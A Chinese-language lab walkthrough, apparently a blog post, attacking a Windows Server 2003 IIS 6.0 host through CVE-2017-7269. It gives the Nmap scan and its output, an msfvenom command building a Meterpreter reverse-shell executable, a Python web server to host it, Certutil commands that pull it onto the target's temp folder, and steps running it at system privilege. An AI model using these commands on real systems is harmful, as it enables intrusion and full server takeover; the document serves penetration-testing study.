目录
本文演示了利用CVE-2017-7269漏洞对Windows Server 2003 IIS6.0服务器进行渗透测试的全过程。攻击者首先通过Nmap扫描确认目标系统存在漏洞,随后使用msfvenom生成恶意可执行文件,并利用Certutil工具上传到靶机。通过普通权限和管理员权限分别执行PoC文件,最终成功获取Meterpreter反弹shell,其中管理员权限下可获得system级别控制权。整个渗透过程展示了从漏洞利用到权限提升的完整攻击链,凸显了该高危漏洞的严重性。
一、CVE-2017-7269漏洞
CVE-2017-7269 是微软 IIS 6.0 服务器上 WebDAV 服务存在的远程代码执行漏洞,主要影响运行 Windows Server 2003 的系统。该漏洞源于 WebDAV 服务对 PROPFIND 等 HTTP 请求的处理存在缺陷,攻击者可通过构造恶意的 HTTP 请求,向目标服务器注入精心设计的代码,进而执行任意命令,获得系统权限。
利用该漏洞无需认证,攻击者只需向目标 IIS 6.0 服务器的 WebDAV 服务发送特制请求,即可触发漏洞,实现远程代码执行。这使得漏洞危害较大,一旦被利用,可能导致服务器被完全控制,造成数据泄露、系统被篡改等严重后果。
二、渗透准备
1、搭建环境
本次渗透渗透测试环境由攻击机与靶机构成:攻击机为 IP 192.168.59.128 的 Kali Linux 系统,搭载 Metasploit、Nmap、msfvenom 等工具,作为主渗透测试平台;靶机为 IP 192.168.59.148 的 Windows Server 2003 系统,运行 IIS 6.0 及 WebDAV 服务,且存在 CVE-2017-7269 漏洞,该漏洞可让攻击者通过构造恶意 PROPFIND 请求远程执行代码,适合开展针对 IIS 6.0 WebDAV 服务的漏洞利用与渗透测试演练。
| 组件 | IP地址 | 操作系统 | 重要工具/服务 | 备注 |
|---|---|---|---|---|
| 攻击机 | 192.168.59.128 | Kali Linux | Metasploit, Nmap、msfvenom | 主渗透测试平台 |
| 靶机 | 192.168.59.148 | Windows Server 2003 | IIS 6.0, WebDAV | 存在CVE-2017-7269漏洞 |
2、信息搜集
使用 Nmap 工具对 IP 地址为 192.168.59.148 的目标主机进行全面扫描的命令。其中 -A 是 “全面扫描” 参数,会启用多种高级扫描功能,包括:探测目标主机开放的端口及服务、识别服务版本信息、检测操作系统类型及版本、运行默认脚本扫描(如漏洞探测、安全配置检查等)、获取主机名和网络信息等。执行后会生成目标的详细网络资产信息,如下所示。
nmap -A 192.168.59.148
这份 Nmap 扫描结果显示,靶机 192.168.59.148 为运行 Windows Server 2003 SP2 的系统,主机名为 LJN-CA424032C9D,加入 WORKGROUP 工作组。开放端口中,80 端口运行 Microsoft IIS 6.0 服务器,支持 WebDAV 服务及 PROPFIND 等方法,存在 CVE-2017-7269 漏洞利用可能;135、139、445 等端口暴露 Windows RPC、SMB 服务,且 SMB 安全模式显示消息签名禁用。整体来看,靶机配置符合 CVE-2017-7269 漏洞环境特征,WebDAV 服务和开放端口为渗透测试提供了潜在入口。
┌──(kali㉿kali)-[/usr/…/modules/exploits/windows/iis]
└─$ nmap -A 192.168.59.148
Starting Nmap 7.92 ( https://nmap.org ) at 2025-09-19 05:09 EDT
Nmap scan report for 192.168.59.148
Host is up (0.0039s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
|_http-server-header: Microsoft-IIS/6.0
| http-webdav-scan:
| Server Date: Fri, 19 Sep 2025 09:09:30 GMT
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| WebDAV type: Unknown
|_ Server Type: Microsoft-IIS/6.0
| http-methods:
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-title: Error
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2003 3790 Service Pack 2 microsoft-ds
1025/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003
Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: -4h00m27s, deviation: 5h39m23s, median: -8h00m27s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: LJN-CA424032C9D, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:79:89:a3 (VMware)
| smb-os-discovery:
| OS: Windows Server 2003 3790 Service Pack 2 (Windows Server 2003 5.2)
| OS CPE: cpe:/o:microsoft:windows_server_2003::sp2
| Computer name: ljn-ca424032c9d
| NetBIOS computer name: LJN-CA424032C9D\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2025-09-19T17:09:30+08:00
三、攻击者生成PoC
本文实验是系列实验,当前已经实现nc反弹shell,接下来我们使用msfvenom生成一个 Windows 平台的 32 位恶意可执行文件 mooyuan.exe。当windows server 2003目标靶机运行此文件时,会主动向 192.168.59.128:4444 发起 TCP 连接,攻击者可通过 Metasploit 监听该端口,获取目标主机的 Meterpreter 交互式控制会话。
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.59.128 LPORT=4444 -f exe -a x86 --platform windows -o mooyuan.exe
-
-p windows/meterpreter/reverse_tcp指定使用的载荷(Payload):
windows:目标操作系统为 Windowsmeterpreter:功能强大的交互式后门(支持命令执行、文件操作等)reverse_tcp:反向 TCP 连接模式(目标机会主动连接攻击者的主机)
-
LHOST=192.168.59.128攻击者的 IP 地址(即恶意程序执行后会主动连接的主机 IP)。
-
LPORT=4444攻击者监听的端口(恶意程序会连接此端口建立通信)。
-
-f exe指定输出文件格式为 Windows 可执行文件(
.exe)。 -
-a x86指定目标架构为 32 位(x86)。
-
--platform windows明确指定目标平台为 Windows。
-
-o mooyuan.exe指定输出的恶意文件名为
mooyuan.exe。
四、攻击者上传MSF PoC文件
1、Kali开启http服务
在PoC文件所在的目录内/home/kali的路径中开启http服务,开启http服务的命令如下所示。
python -m http.server 8081
因此mooyuan.exe的URL地址为http://192.168.59.128:8081/mooyuan.exe 其中192.168.59.128为攻击机ip地址。

2、使用Certutil命令上传到靶机
在nc shell反弹环境向 192.168.59.128:8081 这个地址上传 mooyuan.exe 文件到当前执行命令的目录,并覆盖可能存在的同名文件。这里特别注意,需要我们把文件都下载到%TEMP%目录中,故而需要先使用cd %TEMP%进入到该文件夹中,具体如下所示。
cd %TEMP%
Certutil -urlcache -split -f http://192.168.59.128:8081/mooyuan.exe
rename Blob0_0.bin mooyuan.exe
-
cd %TEMP%%TEMP%是 Windows 系统的环境变量,指向当前用户的临时文件夹(通常为C:\Documents and Settings\用户名\Local Settings\Temp或C:\Users\用户名\AppData\Local\Temp)。- 该命令的作用是切换到临时目录,利用临时目录的可写性和隐蔽性进行后续操作,减少被发现的概率。
-
Certutil -urlcache -split -f http://192.168.59.128:8081/mooyuan.exe- 使用系统自带工具
certutil从攻击机192.168.59.128:8081下载文件mooyuan.exe到当前的临时目录。 - 参数
-urlcache处理 URL 缓存,-split强制文件保存到当前目录(而非系统缓存路径),-f确保覆盖已有文件。 - 特殊情况:部分系统中,
certutil可能将下载文件默认命名为Blob0_0.bin(缓存文件格式),而非预期的mooyuan.exe。
- 使用系统自带工具
-
rename Blob0_0.bin mooyuan.exe- 若上一步下载的文件被自动命名为
Blob0_0.bin,通过rename命令将其重命名为mooyuan.exe,恢复可执行文件格式。 - 目的是使文件能以可执行程序(
.exe)的形式运行,为后续执行恶意代码或漏洞利用工具做准备。
- 若上一步下载的文件被自动命名为
五、MSF反弹shell实战
1、普通权限
(1)执行MSF PoC
在nc的反弹shell中执行MSF恶意文件mooyuan.exe,如下所示。
cd %TEMP%
mooyuan.exe
由于普通权限执行mooyuan.exe经常导致MSF反弹无法成功,故而我这里执行多次,才能在Kali中反弹成功。

(2)反弹成功
如下所示,msf已经成功建立连接,通过getuid获取到当前用户为普通账户。


2、管理员权限
本文是系列文章,当前将提权工具iis6.exe上传到靶机中。
(1)执行MSF PoC
在nc的反弹shell中通过iis6.exe使用管理员权限执行MSF恶意文件mooyuan.exe,如下所示。
iis6.exe "mooyuan.exe"

(2)反弹成功
如下所示,msf已经成功建立连接,通过getuid获取到当前用户为管理员system权限。

4288

被折叠的 条评论
为什么被折叠?



